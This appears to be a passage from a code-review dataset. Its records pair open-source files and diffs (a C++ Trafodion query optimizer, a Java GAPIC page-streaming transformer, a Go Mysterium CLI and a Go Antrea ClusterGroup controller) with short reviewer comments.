the join predicate double threshold, // IN: the threshold SkewedValueList** skList // OUT: the skew list ) const { // Can not deal with multicolumn skew in this method. if ( joinPreds.entries() != 1 ) return FALSE; NABoolean statsExist; // a place holder Int32 skews = 0; for(ValueId vid = joinPreds.init(); joinPreds.next(vid); joinPreds.advance(vid)) { *skList = child(i).getGroupAttr()-> getSkewedValues(vid, threshold, statsExist, (*GLOBAL_EMPTY_INPUT_LOGPROP), isLeftJoin()/* include skewed NULLs only for left outer join */ ); if (*skList == NULL || (*skList)->entries() == 0) break; else skews++; } return ( skews == joinPreds.entries() ); } // // Check if some join column is of a SQL type whose run-time // implementation has a limitation for SB to work. // // return // TRUE: no limitation // FALSE: has limitation and SB should not be applied // NABoolean Join::singleColumnjoinPredOKforSB(ValueIdSet& joinPreds) { ValueId vId((CollIndex)0); joinPreds.next(vId); ItemExpr* iePtr = vId.getItemExpr(); if (iePtr->getOperatorType() == ITM_INSTANTIATE_NULL) { iePtr = iePtr -> child(0); } ValueIdSet vidSet; switch (iePtr->getOperatorType()) { case ITM_EQUAL: // this case is used to handle char type when // no VEG is formed for a char predicate, // or joins involving subqueries. case ITM_VEG_PREDICATE: case ITM_VEG_REFERENCE: // We only care columns of type ITM_BASECOLUMN (columns belonging to // base tables or table-valued stored procedures, see comment on class // BaseColumn). iePtr->findAll(ITM_BASECOLUMN, vidSet, TRUE, TRUE); // If no such columns can be found. Do not bother to continue further, // as only base table columns have the potential to be big and skewed. 
if ( vidSet.entries() == 0 ) return FALSE; break; default: return FALSE; } ValueId colVid((CollIndex)0); vidSet.next(colVid); if ( !colVid.getType().isSkewBusterSupportedType() ) return FALSE; // Additional test if ( colVid.getType().getTypeQualifier() == NA_NUMERIC_TYPE && colVid.getType().getTypeName() == LiteralNumeric ) { // Exact decimal numeric such as NUMERIC(18,15) can be handled, if // all columns involved in join are of the exact same precision and // and scale. The comparison ignores NULL attribute of the type (ALM 4953). for(ValueId x = vidSet.init(); vidSet.next(x); vidSet.advance(x)) { if ( NOT ((NumericType&)(colVid.getType())).equalIgnoreNull(x.getType())) return FALSE; } return TRUE; } else if ( DFS2REC::isAnyCharacter(colVid.getType().getFSDatatype()) ) { if ( ((const CharType&)colVid.getType()).getStrCharLimit() > (Lng32) CmpCommon::getDefaultNumeric(USTAT_MAX_CHAR_BOUNDARY_LEN) ) return FALSE; } return TRUE; } NABoolean Join::multiColumnjoinPredOKforSB(ValueIdSet& joinPreds) { for(ValueId x = joinPreds.init(); joinPreds.next(x); joinPreds.advance(x)) { ValueIdSet dummy(x); if ( !singleColumnjoinPredOKforSB(dummy) ) return FALSE; } return TRUE; } // The new way to capture MC skews. All such skews have been computed during // update stats. NABoolean Join::childNodeContainMultiColumnSkew( CollIndex i, // IN: which child to work on const ValueIdSet& joinPreds, // IN: the join predicate double mc_threshold, // IN: multi-column threshold Lng32 countOfPipelines, // IN: SkewedValueList** skList // OUT: the skew list ) { if (joinPreds.entries() <= 1) return FALSE; const ColStatDescList& theColList = child(i).outputLogProp((*GLOBAL_EMPTY_INPUT_LOGPROP))->colStats(); ValueId col; ValueIdSet lhsCols; CollIndex index = NULL_COLL_INDEX; const ValueIdSet& joiningCols = (i==0) ? 
getEquiJoinExprFromChild0() : getEquiJoinExprFromChild1() ; for (col = joiningCols.init(); joiningCols.next(col); joiningCols.advance(col) ) { theColList.getColStatDescIndex(index, col); if (index != NULL_COLL_INDEX) lhsCols.insert(theColList[index]->getColumn()); } ValueIdList dummyList; const MCSkewedValueList* mcSkewList = ((ColStatDescList&)theColList).getMCSkewedValueListForCols(lhsCols, dummyList); if ( mcSkewList == NULL ) return FALSE; // Apply the frequency threshold to each MC skew and store those passing // the thredhold test to the new skList CostScalar rc = child(i).getGroupAttr()->getResultCardinalityForEmptyInput(); CostScalar thresholdFrequency = rc * mc_threshold; *skList = new (CmpCommon::statementHeap()) SkewedValueList((CmpCommon::statementHeap())); for ( CollIndex i=0; i<mcSkewList->entries(); i++ ) { MCSkewedValue* itm = mcSkewList->at(i); if ( itm->getFrequency() >= thresholdFrequency ) { // Use an EncodedValue object to represent the current MC skew // and transfer the hash value to it. The hash value is // computed in EncodedValue::computeRunTimeHashValue() and is // the run-time version! No modification should be done to it // from this point on. EncodedValue mcSkewed = itm->getHash(); (*skList)->insertInOrder(mcSkewed); } } // Set the run-time hash status flag so that we will not try to build // the run-time hash again in // SkewedDataPartitioningFunction::buildHashListForSkewedValues(). (*skList)->setComputeFinalHash(FALSE); if ( (*skList)->entries() == 0) return FALSE; return TRUE; } // The old way to guess MC skews and repartition the data stream on one // of the columns with least skews. 
NABoolean Join::childNodeContainMultiColumnSkew( CollIndex i, // IN: which child to work on const ValueIdSet& joinPreds, // IN: the join predicate double mc_threshold, // IN: multi-column threshold double sc_threshold, // IN: single-column threshold Lng32 countOfPipelines, // IN: SkewedValueList** skList, // OUT: the skew list ValueId& vidOfEquiJoinWithSkew // OUT: the valueId of the column // whose skew list is returned ) const { if (joinPreds.entries() <= 1) return FALSE; typedef SkewedValueList* SkewedValueListPtr; SkewedValueList** skewLists; skewLists = new(CmpCommon::statementHeap()) SkewedValueListPtr[joinPreds.entries()]; CostScalar* skewFactors = new(CmpCommon::statementHeap()) CostScalar[joinPreds.entries()]; // A list of valueIdSets, each valueIdSet element contains a set of // columns from the join predicates. Each set has all columns from the // same table participating in the join predicates. ARRAY(ValueIdSet) mcArray(CmpCommon::statementHeap(), joinPreds.entries()); Int32 skews = 0, leastSkewList = 0; EncodedValue mostFreqVal; CostScalar productOfSkewFactors = csOne; CostScalar productOfUecs = csOne; CostScalar minOfSkewFactor = csMinusOne; CostScalar rc = csMinusOne; CostScalar currentSkew; CollIndex j = 0; NABoolean statsExist; for(ValueId vid = joinPreds.init(); joinPreds.next(vid); joinPreds.advance(vid)) { // Get the skew values for the join predicate in question. skewLists[skews] = child(i).getGroupAttr()-> getSkewedValues(vid, sc_threshold, statsExist, (*GLOBAL_EMPTY_INPUT_LOGPROP), isLeftJoin() /* include skewed NULLs only for left outer join */ ); // When the skew list is null, there are two possibilities. // 1. No stats exists, here we assume the worse (stats has not been updated), and // move to the next join predicate. // 2. The stats is present but we could not detect skews (e.g., the skews are // too small to pass the threshold test). 
We return FALSE to indicate that the // column is good enough to smooth out the potential skews in other columns. if ( skewLists[skews] == NULL ) { if ( !statsExist ) continue; else return FALSE; // no stats exist } // Pick the shortest skew list seen so far. The final shortest skew list // will be used for run-time skew detection. if ( skews == 0 || (skewLists[skews] && skewLists[skews] -> entries() < skewLists[leastSkewList] -> entries() ) ) { // Obtain the colstat for the child of the join predicate on // the other side of the join. CollIndex brSide = (i==0) ? 1 : 0; ColStatsSharedPtr colStats = child(brSide).getGroupAttr()-> getColStatsForSkewDetection(vid, (*GLOBAL_EMPTY_INPUT_LOGPROP)); if ( colStats == NULL ) return FALSE; // no stats exist for the inner. assume the worst // get the skew list const FrequentValueList & skInner = colStats->getFrequentValues(); CollIndex index = 0; const SkewedValueList& newList = *skewLists[skews]; CostScalar totalFreq = csZero; const NAType* nt = newList.getNAType(); NABoolean useHash = nt->useHashRepresentation(); for (CollIndex index = 0; index < skInner.entries(); index++) { const FrequentValue& fv = skInner[index]; EncodedValue skew = ( useHash ) ? fv.getHash() : fv.getEncodedValue(); if ( nt->getTypeQualifier() == NA_NUMERIC_TYPE && nt->getTypeName() == LiteralNumeric ) { skew = fv.getEncodedValue().computeHashForNumeric((SQLNumeric*)nt); } if ( newList.contains(skew) ) //totalFreq += fv.getFrequency() * fv.getProbability(); totalFreq += fv.getFrequency() ; } CostScalar totalInnerBroadcastInBytes = totalFreq * child(brSide).getGroupAttr()->getRecordLength() * countOfPipelines ; if (totalInnerBroadcastInBytes >= ActiveSchemaDB()->getDefaults() .getAsLong(MC_SKEW_INNER_BROADCAST_THRESHOLD)) // ACX QUERY 5 and 8 have skews on the inner side. Better // to bet on partitioning on all columns to handle the dual skews. 
// This has been proved by the performance run on 3/21/2012: a // 6% degradation when partition on the remaining non-skew column. return FALSE; leastSkewList = skews; vidOfEquiJoinWithSkew = vid; } // Get the skew factor for the join predicate in question. skewFactors[skews] = currentSkew = child(i).getGroupAttr()-> getSkewnessFactor(vid, mostFreqVal, (*GLOBAL_EMPTY_INPUT_LOGPROP)); // We compute SFa * SFb * SFc ... here productOfSkewFactors *= currentSkew; // Obtain the colstat for the ith child of the join predicate. ColStatsSharedPtr colStats = child(i).getGroupAttr()-> getColStatsForSkewDetection(vid, (*GLOBAL_EMPTY_INPUT_LOGPROP)); if ( colStats == NULL ) return FALSE; // no stats exist. Can not make the decision. return FALSE. // Compute UECa * UECb * UECc ... here productOfUecs *= colStats->getTotalUec(); // get the RC of the table if ( rc == csMinusOne ) rc = colStats->getRowcount(); // Compute the minimal of the skew factors seen so far if ( currentSkew.isGreaterThanZero() ) { if ( minOfSkewFactor == csMinusOne || minOfSkewFactor > currentSkew ) minOfSkewFactor = currentSkew; } skews++; // Collect join columns in this predicate into joinColumns data structure. ValueIdSet joinColumns; vid.getItemExpr() -> findAll(ITM_BASECOLUMN, joinColumns, TRUE, FALSE); // Separate out columns in the join predicates and group them per table. // // For example, if join predicates are t.a=s.b and t.b=s.b and t.c = s.c, // we will have // // mcArray[0] = {t.a, t.b, t.c}, // mcArray[1] = {s.a, s.b, s.c}, // // at the end of the loop over join predicates. // j = 0; for(ValueId x = joinColumns.init(); joinColumns.next(x); joinColumns.advance(x)) { if ( !mcArray.used(j) ) mcArray.insertAt(j, x); else { ValueIdSet& mcSet = mcArray[j]; mcSet.insert(x); } j++; } } // end of the loop of join predicates // Now we can find the multi-column UEC, using one of the two multi-column // ValueIdSets (one for each side of the equi-join predicate). 
The colstats // list for the side of the child contains the stats (including the mc ones). // one of the mc ones is what we are looking for. // ColStatDescList colStatDescList = child(i).getGroupAttr()-> outputLogProp((*GLOBAL_EMPTY_INPUT_LOGPROP))->getColStats(); CostScalar mcUec = csMinusOne; const MultiColumnUecList* uecList = colStatDescList.getUecList(); for(j=0; j < mcArray.entries() && mcUec == csMinusOne && uecList; j++) { const ValueIdSet& mc = mcArray[j]; // Do a look up with mc. if ( uecList ) mcUec = uecList->lookup(mc); } // // Compute the final value of // min( (SFa * SFb * ... *min(UECa * UECb..,RC))/UEC(abc..), // SFa, SFb, ..., ) // = min(productOfSkewFactors * min(productOfUecs, RC)/mcUEC, // minOfSkewFactor) // // min(productOfUecs, RC)/mcUEC = 1 when mcUEC is not found // CostScalar mcSkewFactor; if ( mcUec == csMinusOne || mcUec == csZero ) mcSkewFactor = MINOF(productOfSkewFactors, minOfSkewFactor); else mcSkewFactor = MINOF( productOfSkewFactors * MINOF(productOfUecs, rc) / mcUec, minOfSkewFactor ); if ( mcSkewFactor > mc_threshold ) { *skList = skewLists[leastSkewList]; return TRUE; } else return FALSE; } // // The content of this method is lifted from // DP2InsertCursorRule::nextSubstitute(). // A Note has been added in that method so that any changes // to it should be "copied" here. // NABoolean Insert::isSideTreeInsertFeasible() { // Sidetree insert is only supported for key sequenced, non-compressed, // non-audited tables with blocksize equal to 4K. // Return error, if this is not the case. Insert::InsertType itype = getInsertType(); // Sidetree insert requested? 
if (itype != Insert::VSBB_LOAD ) return FALSE; if ((getTableDesc()->getClusteringIndex()->getNAFileSet() ->isCompressed()) || (getTableDesc()->getClusteringIndex()->getNAFileSet() ->getBlockSize() < 4096) || (NOT getTableDesc()->getClusteringIndex()->getNAFileSet() ->isKeySequenced()) || (getTableDesc()->getClusteringIndex()->getNAFileSet() ->isAudited()) ) { return FALSE; } if ( !getInliningInfo().hasPipelinedActions() ) return TRUE; if (getInliningInfo().isEffectiveGU() || getTolerateNonFatalError() == RelExpr::NOT_ATOMIC_) return FALSE; // SideInsert is not allowed when there are pipelined actions (RI, // IM or triggers) except MV range logging. This means the only rows // projected are the very first and last rows as the beginning and // end of the range. NABoolean rangeLoggingRequired = getTableDesc()->getNATable()->getMvAttributeBitmap(). getAutomaticRangeLoggingRequired(); if (getInliningInfo().isProjectMidRangeRows() || !rangeLoggingRequired) return FALSE; return TRUE; } // big memory growth percent (to be used by SSD overlow enhancement project) short RelExpr::bmoGrowthPercent(CostScalar e, CostScalar m) { // bmo growth is 10% if 100*abs(maxcard-expected)/expected <= 100% // otherwise its 25% CostScalar expectedRows = e.minCsOne(); CostScalar maxRows = m.minCsOne(); CostScalar difference = maxRows - expectedRows; CostScalar uncertainty = (_ABSOLUTE_VALUE_(difference.value()) / expectedRows.value()) * 100; if (uncertainty <= 100) return 10; else return 25; } CostScalar RelExpr::getChild0Cardinality(const Context* context) { EstLogPropSharedPtr inLogProp = context->getInputLogProp(); EstLogPropSharedPtr ch0OutputLogProp = child(0).outputLogProp(inLogProp); const CostScalar ch0RowCount = (ch0OutputLogProp) ? 
(ch0OutputLogProp->getResultCardinality()).minCsOne() : csOne; return ch0RowCount; } NAString *RelExpr::getKey() { if (operKey_.length() == 0) { char keyBuffer[30]; snprintf(keyBuffer, sizeof(keyBuffer), "%ld", (Int64)this); operKey_ = keyBuffer; } return &operKey_; }
1
20,040
A small nit: This variable should start with a lower case letter.
apache-trafodion
cpp
@@ -38,12 +38,13 @@ public class PageStreamingTransformer { PageStreamingDescriptorView.Builder descriptor = PageStreamingDescriptorView.newBuilder(); descriptor.varName(context.getNamer().getPageStreamingDescriptorName(method)); - descriptor.requestTokenFieldName(pageStreaming.getRequestTokenField().getSimpleName()); + descriptor.requestTokenFieldName(context.getNamer().getRequestTokenFieldName(pageStreaming)); if (pageStreaming.hasPageSizeField()) { - descriptor.requestPageSizeFieldName(pageStreaming.getPageSizeField().getSimpleName()); + descriptor.requestPageSizeFieldName(context.getNamer().getPageSizeFieldName(pageStreaming)); } - descriptor.responseTokenFieldName(pageStreaming.getResponseTokenField().getSimpleName()); - descriptor.resourcesFieldName(pageStreaming.getResourcesFieldName()); + descriptor.responseTokenFieldName( + context.getNamer().getResponseTokenFieldName(pageStreaming)); + descriptor.resourcesFieldName(context.getNamer().getResourcesFieldName(pageStreaming)); descriptor.methodName(context.getNamer().getMethodKey(method)); descriptors.add(descriptor.build());
1
/* Copyright 2016 Google Inc * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.api.codegen.transformer; import com.google.api.codegen.config.FieldConfig; import com.google.api.codegen.config.MethodConfig; import com.google.api.codegen.config.PageStreamingConfig; import com.google.api.codegen.viewmodel.PageStreamingDescriptorClassView; import com.google.api.codegen.viewmodel.PageStreamingDescriptorView; import com.google.api.codegen.viewmodel.PagedListResponseFactoryClassView; import com.google.api.tools.framework.model.Field; import com.google.api.tools.framework.model.Method; import com.google.api.tools.framework.model.TypeRef; import java.util.ArrayList; import java.util.List; /** PageStreamingTransformer generates view objects for page streaming from a service model. 
*/ public class PageStreamingTransformer { public List<PageStreamingDescriptorView> generateDescriptors(SurfaceTransformerContext context) { List<PageStreamingDescriptorView> descriptors = new ArrayList<>(); for (Method method : context.getPageStreamingMethods()) { MethodConfig methodConfig = context.getMethodConfig(method); PageStreamingConfig pageStreaming = methodConfig.getPageStreaming(); PageStreamingDescriptorView.Builder descriptor = PageStreamingDescriptorView.newBuilder(); descriptor.varName(context.getNamer().getPageStreamingDescriptorName(method)); descriptor.requestTokenFieldName(pageStreaming.getRequestTokenField().getSimpleName()); if (pageStreaming.hasPageSizeField()) { descriptor.requestPageSizeFieldName(pageStreaming.getPageSizeField().getSimpleName()); } descriptor.responseTokenFieldName(pageStreaming.getResponseTokenField().getSimpleName()); descriptor.resourcesFieldName(pageStreaming.getResourcesFieldName()); descriptor.methodName(context.getNamer().getMethodKey(method)); descriptors.add(descriptor.build()); } return descriptors; } public List<PageStreamingDescriptorClassView> generateDescriptorClasses( SurfaceTransformerContext context) { List<PageStreamingDescriptorClassView> descriptors = new ArrayList<>(); for (Method method : context.getPageStreamingMethods()) { descriptors.add(generateDescriptorClass(context.asRequestMethodContext(method))); } return descriptors; } private PageStreamingDescriptorClassView generateDescriptorClass( MethodTransformerContext context) { SurfaceNamer namer = context.getNamer(); ModelTypeTable typeTable = context.getTypeTable(); Method method = context.getMethod(); PageStreamingConfig pageStreaming = context.getMethodConfig().getPageStreaming(); PageStreamingDescriptorClassView.Builder desc = PageStreamingDescriptorClassView.newBuilder(); Field resourceField = pageStreaming.getResourcesField(); FieldConfig resourceFieldConfig = pageStreaming.getResourcesFieldConfig(); TypeRef resourceType = 
resourceField.getType(); desc.name(namer.getPageStreamingDescriptorConstName(method)); desc.typeName(namer.getAndSavePagedResponseTypeName(method, typeTable, resourceFieldConfig)); desc.requestTypeName(typeTable.getAndSaveNicknameFor(method.getInputType())); desc.responseTypeName(typeTable.getAndSaveNicknameFor(method.getOutputType())); desc.resourceTypeName(typeTable.getAndSaveNicknameForElementType(resourceField.getType())); TypeRef tokenType = pageStreaming.getResponseTokenField().getType(); desc.tokenTypeName(typeTable.getAndSaveNicknameFor(tokenType)); desc.defaultTokenValue(context.getTypeTable().getSnippetZeroValueAndSaveNicknameFor(tokenType)); desc.requestTokenSetFunction( namer.getFieldSetFunctionName(pageStreaming.getRequestTokenField())); if (pageStreaming.hasPageSizeField()) { desc.requestPageSizeSetFunction( namer.getFieldSetFunctionName(pageStreaming.getPageSizeField())); desc.requestPageSizeGetFunction( namer.getFieldGetFunctionName(pageStreaming.getPageSizeField())); } desc.responseTokenGetFunction( namer.getFieldGetFunctionName(pageStreaming.getResponseTokenField())); desc.resourcesFieldGetFunction( namer.getFieldGetFunctionName(pageStreaming.getResourcesField())); return desc.build(); } public List<PagedListResponseFactoryClassView> generateFactoryClasses( SurfaceTransformerContext context) { List<PagedListResponseFactoryClassView> factories = new ArrayList<>(); for (Method method : context.getPageStreamingMethods()) { factories.add(generateFactoryClass(context.asRequestMethodContext(method))); } return factories; } private PagedListResponseFactoryClassView generateFactoryClass(MethodTransformerContext context) { SurfaceNamer namer = context.getNamer(); ModelTypeTable typeTable = context.getTypeTable(); Method method = context.getMethod(); PageStreamingConfig pageStreaming = context.getMethodConfig().getPageStreaming(); Field resourceField = pageStreaming.getResourcesField(); FieldConfig resourceFieldConfig = 
pageStreaming.getResourcesFieldConfig(); PagedListResponseFactoryClassView.Builder factory = PagedListResponseFactoryClassView.newBuilder(); factory.name(namer.getPagedListResponseFactoryConstName(method)); factory.requestTypeName(typeTable.getAndSaveNicknameFor(method.getInputType())); factory.responseTypeName(typeTable.getAndSaveNicknameFor(method.getOutputType())); factory.resourceTypeName(typeTable.getAndSaveNicknameForElementType(resourceField.getType())); factory.pagedListResponseTypeName( namer.getAndSavePagedResponseTypeName(method, typeTable, resourceFieldConfig)); factory.pageStreamingDescriptorName(namer.getPageStreamingDescriptorConstName(method)); return factory.build(); } }
1
21,651
Where is this used for Node?
googleapis-gapic-generator
java
@@ -130,14 +130,14 @@ func (c *Command) handleActions(line string) { func (c *Command) connect(argsString string) { if len(argsString) == 0 { - info("Press tab to select identity or create a new one. Connect <your-identity> <node-identity>") + info("Press tab to select identity or create a new one. Connect <your-id> <provider-id>") return } identities := strings.Fields(argsString) if len(identities) != 2 { - info("Please type in the node identity. Connect <your-identity> <node-identity>") + info("Please type in the provider identity. Connect <your-id> <provider-id>") return }
1
package cli import ( "fmt" "github.com/chzyer/readline" tequilapi_client "github.com/mysterium/node/tequilapi/client" "io" "log" "strings" ) // NewCommand constructs CLI based with possibility to control quiting func NewCommand( historyFile string, tequilapi *tequilapi_client.Client, quitHandler func() error, ) *Command { return &Command{ historyFile: historyFile, tequilapi: tequilapi, quitHandler: quitHandler, } } // Command describes CLI based Mysterium UI type Command struct { historyFile string tequilapi *tequilapi_client.Client quitHandler func() error fetchedProposals []tequilapi_client.ProposalDTO completer *readline.PrefixCompleter reader *readline.Instance } const redColor = "\033[31m%s\033[0m" const identityDefaultPassphrase = "" const statusConnected = "Connected" // Run starts CLI interface func (c *Command) Run() (err error) { c.fetchedProposals = c.fetchProposals() c.completer = newAutocompleter(c.tequilapi, c.fetchedProposals) c.reader, err = readline.NewEx(&readline.Config{ Prompt: fmt.Sprintf(redColor, "» "), HistoryFile: c.historyFile, AutoComplete: c.completer, InterruptPrompt: "^C", EOFPrompt: "exit", }) if err != nil { return err } // TODO Should overtake output of CommandRun log.SetOutput(c.reader.Stderr()) for { line, err := c.reader.Readline() if err == readline.ErrInterrupt { if len(line) == 0 { c.quit() } else { continue } } else if err == io.EOF { c.quit() } c.handleActions(line) } return nil } //Kill stops tequilapi service func (c *Command) Kill() error { c.reader.Clean() err := c.reader.Close() if err != nil { return err } return c.quitHandler() } func (c *Command) handleActions(line string) { line = strings.TrimSpace(line) staticCmds := []struct { command string handler func() }{ {"exit", c.quit}, {"quit", c.quit}, {"help", c.help}, {"status", c.status}, {"proposals", c.proposals}, {"ip", c.ip}, {"disconnect", c.disconnect}, } argCmds := []struct { command string handler func(argsString string) }{ {command: "connect", handler: 
c.connect}, {command: "unlock", handler: c.unlock}, {command: "identities", handler: c.identities}, } for _, cmd := range staticCmds { if line == cmd.command { cmd.handler() return } } for _, cmd := range argCmds { if strings.HasPrefix(line, cmd.command) { argsString := strings.TrimSpace(line[len(cmd.command):]) cmd.handler(argsString) return } } if len(line) > 0 { c.help() } } func (c *Command) connect(argsString string) { if len(argsString) == 0 { info("Press tab to select identity or create a new one. Connect <your-identity> <node-identity>") return } identities := strings.Fields(argsString) if len(identities) != 2 { info("Please type in the node identity. Connect <your-identity> <node-identity>") return } consumerID, providerID := identities[0], identities[1] if consumerID == "new" { id, err := c.tequilapi.NewIdentity(identityDefaultPassphrase) if err != nil { warn(err) return } consumerID = id.Address success("New identity created:", consumerID) } status("CONNECTING", "from:", consumerID, "to:", providerID) _, err := c.tequilapi.Connect(consumerID, providerID) if err != nil { warn(err) return } success("Connected.") } func (c *Command) unlock(argsString string) { unlockSignature := "Unlock <identity> [passphrase]" if len(argsString) == 0 { info("Press tab to select identity.", unlockSignature) return } args := strings.Fields(argsString) var identity, passphrase string if len(args) == 1 { identity, passphrase = args[0], "" } else if len(args) == 2 { identity, passphrase = args[0], args[1] } else { info("Please type in identity and optional passphrase.", unlockSignature) return } info("Unlocking", identity) err := c.tequilapi.Unlock(identity, passphrase) if err != nil { warn(err) return } success(fmt.Sprintf("Identity %s unlocked.", identity)) } func (c *Command) disconnect() { err := c.tequilapi.Disconnect() if err != nil { warn(err) return } success("Disconnected.") } func (c *Command) status() { status, err := c.tequilapi.Status() if err != nil { warn(err) } 
else { info("Status:", status.Status) info("SID:", status.SessionID) } if status.Status == statusConnected { statistics, err := c.tequilapi.ConnectionStatistics() if err != nil { warn(err) } else { info(fmt.Sprintf("Connection duration: %ds", statistics.Duration)) info("Bytes sent:", statistics.BytesSent) info("Bytes received:", statistics.BytesReceived) } } } func (c *Command) proposals() { proposals := c.fetchProposals() c.fetchedProposals = proposals info(fmt.Sprintf("Found %v proposals", len(proposals))) for _, proposal := range proposals { country := proposal.ServiceDefinition.LocationOriginate.Country var countryString string if country != nil { countryString = *country } else { countryString = "Unknown" } msg := fmt.Sprintf("- provider id: %v, proposal id: %v, country: %v", proposal.ProviderID, proposal.ID, countryString) info(msg) } } func (c *Command) fetchProposals() []tequilapi_client.ProposalDTO { proposals, err := c.tequilapi.Proposals() if err != nil { warn(err) return []tequilapi_client.ProposalDTO{} } return proposals } func (c *Command) ip() { ip, err := c.tequilapi.GetIP() if err != nil { warn(err) return } info("IP:", ip) } func (c *Command) help() { info("Mysterium CLI tequilapi commands:") fmt.Println(c.completer.Tree(" ")) } func (c *Command) quit() { err := c.Kill() if err != nil { warn(err) return } } func (c *Command) identities(argsString string) { const usage = "identities command:\n list\n new [passphrase]" if len(argsString) == 0 { info(usage) return } args := strings.Fields(argsString) if len(args) < 1 { info(usage) return } action := args[0] if action == "list" { if len(args) > 1 { info(usage) return } ids, err := c.tequilapi.GetIdentities() if err != nil { fmt.Println("Error occured:", err) return } for _, id := range ids { status("+", id.Address) } return } if action == "new" { var passphrase string if len(args) == 1 { passphrase = identityDefaultPassphrase } else if len(args) == 2 { passphrase = args[1] } else { info(usage) return 
} id, err := c.tequilapi.NewIdentity(passphrase) if err != nil { warn(err) return } success("New identity created:", id.Address) } } func getIdentityOptionList(tequilapi *tequilapi_client.Client) func(string) []string { return func(line string) []string { identities := []string{"new"} ids, err := tequilapi.GetIdentities() if err != nil { warn(err) return identities } for _, id := range ids { identities = append(identities, id.Address) } return identities } } func getProposalOptionList(proposals []tequilapi_client.ProposalDTO) func(string) []string { return func(line string) []string { var providerIDS []string for _, proposal := range proposals { providerIDS = append(providerIDS, proposal.ProviderID) } return providerIDS } } func newAutocompleter(tequilapi *tequilapi_client.Client, proposals []tequilapi_client.ProposalDTO) *readline.PrefixCompleter { return readline.NewPrefixCompleter( readline.PcItem( "connect", readline.PcItemDynamic( getIdentityOptionList(tequilapi), readline.PcItemDynamic( getProposalOptionList(proposals), ), ), ), readline.PcItem( "identities", readline.PcItem("new"), readline.PcItem("list"), ), readline.PcItem("status"), readline.PcItem("proposals"), readline.PcItem("ip"), readline.PcItem("disconnect"), readline.PcItem("help"), readline.PcItem("quit"), readline.PcItem( "unlock", readline.PcItemDynamic( getIdentityOptionList(tequilapi), ), ), ) }
1
10,396
Is `<your-id>` really easier to understand than `<your-identity>` for CLI user? For me, `identity` seems like a concept we use publicly, and `id` is just an internal shortcut for it.
mysteriumnetwork-node
go
@@ -39,7 +39,11 @@ func (n *NetworkPolicyController) addClusterGroup(curObj interface{}) { key := internalGroupKeyFunc(cg) klog.V(2).Infof("Processing ADD event for ClusterGroup %s", cg.Name) newGroup := n.processClusterGroup(cg) - klog.V(2).Infof("Creating new internal Group %s with selector (%s)", newGroup.UID, newGroup.Selector.NormalizedName) + if newGroup.ServiceReference != nil { + klog.V(2).Infof("Creating new internal Group %s for Service %s/%s", newGroup.UID, newGroup.ServiceReference.Namespace, newGroup.ServiceReference.Name) + } else if newGroup.Selector != nil { + klog.V(2).Infof("Creating new internal Group %s with selector (%s)", newGroup.UID, newGroup.Selector.NormalizedName) + } n.internalGroupStore.Create(newGroup) n.enqueueInternalGroup(key) }
1
// Copyright 2021 Antrea Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package networkpolicy import ( "context" "fmt" v1 "k8s.io/api/core/v1" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/apimachinery/pkg/labels" "k8s.io/apimachinery/pkg/util/sets" "k8s.io/client-go/tools/cache" "k8s.io/klog" "github.com/vmware-tanzu/antrea/pkg/apis/controlplane" corev1a2 "github.com/vmware-tanzu/antrea/pkg/apis/core/v1alpha2" secv1alpha1 "github.com/vmware-tanzu/antrea/pkg/apis/security/v1alpha1" "github.com/vmware-tanzu/antrea/pkg/controller/networkpolicy/store" antreatypes "github.com/vmware-tanzu/antrea/pkg/controller/types" "github.com/vmware-tanzu/antrea/pkg/k8s" ) // addClusterGroup is responsible for processing the ADD event of a ClusterGroup resource. func (n *NetworkPolicyController) addClusterGroup(curObj interface{}) { cg := curObj.(*corev1a2.ClusterGroup) key := internalGroupKeyFunc(cg) klog.V(2).Infof("Processing ADD event for ClusterGroup %s", cg.Name) newGroup := n.processClusterGroup(cg) klog.V(2).Infof("Creating new internal Group %s with selector (%s)", newGroup.UID, newGroup.Selector.NormalizedName) n.internalGroupStore.Create(newGroup) n.enqueueInternalGroup(key) } // updateClusterGroup is responsible for processing the UPDATE event of a ClusterGroup resource. 
func (n *NetworkPolicyController) updateClusterGroup(oldObj, curObj interface{}) { cg := curObj.(*corev1a2.ClusterGroup) og := oldObj.(*corev1a2.ClusterGroup) key := internalGroupKeyFunc(cg) klog.V(2).Infof("Processing UPDATE event for ClusterGroup %s", cg.Name) newGroup := n.processClusterGroup(cg) oldGroup := n.processClusterGroup(og) selUpdated := newGroup.Selector.NormalizedName != oldGroup.Selector.NormalizedName ipBlockUpdated := newGroup.IPBlock != oldGroup.IPBlock if !selUpdated && !ipBlockUpdated { // No change in the selectors of the ClusterGroup. No need to enqueue for further sync. return } n.internalGroupStore.Update(newGroup) n.enqueueInternalGroup(key) } // deleteClusterGroup is responsible for processing the DELETE event of a ClusterGroup resource. func (n *NetworkPolicyController) deleteClusterGroup(oldObj interface{}) { og, ok := oldObj.(*corev1a2.ClusterGroup) klog.V(2).Infof("Processing DELETE event for ClusterGroup %s", og.Name) if !ok { tombstone, ok := oldObj.(cache.DeletedFinalStateUnknown) if !ok { klog.Errorf("Error decoding object when deleting ClusterGroup, invalid type: %v", oldObj) return } og, ok = tombstone.Obj.(*corev1a2.ClusterGroup) if !ok { klog.Errorf("Error decoding object tombstone when deleting ClusterGroup, invalid type: %v", tombstone.Obj) return } } key := internalGroupKeyFunc(og) klog.V(2).Infof("Deleting internal Group %s", key) err := n.internalGroupStore.Delete(key) if err != nil { klog.Errorf("Unable to delete internal Group %s from store: %v", key, err) } } func (n *NetworkPolicyController) processClusterGroup(cg *corev1a2.ClusterGroup) *antreatypes.Group { internalGroup := antreatypes.Group{ Name: cg.Name, UID: cg.UID, } if cg.Spec.IPBlock != nil { ipb, _ := toAntreaIPBlockForCRD(cg.Spec.IPBlock) internalGroup.IPBlock = ipb return &internalGroup } groupSelector 